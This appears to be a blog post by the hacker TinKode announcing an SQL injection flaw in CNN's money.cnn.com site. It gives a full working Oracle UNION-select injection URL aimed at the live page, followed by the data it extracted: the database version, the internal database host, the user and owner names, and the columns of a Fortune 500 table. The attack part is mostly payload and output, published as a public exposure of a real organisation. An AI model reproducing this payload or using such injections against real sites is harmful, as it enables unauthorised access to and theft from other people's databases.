CNN vulnerable to SQL Injection

CNN

Vulnerable to Oracle Injection
#TinKode & skpx

CNN.com is among the world's leaders in online news and information delivery. Staffed 24 hours, seven days a week by a dedicated staff in CNN's world headquarters in Atlanta, Georgia, and in bureaus worldwide, CNN.com relies heavily on CNN's global team of almost 4,000 news professionals. CNN.com features the latest multimedia technologies, from live video streaming to audio packages to searchable archives of news features and background information. The site is updated continuously throughout the day.

Website vulnerable: cgi.money.cnn.com

Link:

http://cgi.money.cnn.com/tools/fortune/compare_2009.jsp?id=11439)/**/and/**/1=2/**/union/**/all/**/select/**/1,2,chr(94)||banner||ch r(94),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/(select/**/rownum/**/r,banner/**/from/**/(select/**/rownum/**/r,banner/**/from/**/v$version/**/where/** /rownum1-1/**/order/**/by/**/1)t/**/where/**/1=1/**/)--&view=b

Informations:

Version : Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production

Main Database : MONEYP1.TURNER.COM

User : TIME_USR

Owner : SYS

Columns from “Time_Owner.F500_2009“:

[1] RANK
[2] COMPANY_ID
[3] NAME
[4] REVENUE
[5] REVENUE_GROWTH
[6] PROFIT
[7] PROFIT_GROWTH
[8] PROF_PCT_REVENUE
[9] PROF_PCT_ASSETS
[10] PROF_PCT_EQUITY
[11] EPS_10YR_GROWTH
[12] TRI_10YR
[13] TRI
[14] EMPLOYEES
[15] EMPLOYEE_GROWTH

# Thanks, and have a nice day!
# TinKode

Advertisements

7 thoughts on “CNN vulnerable to SQL Injection

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s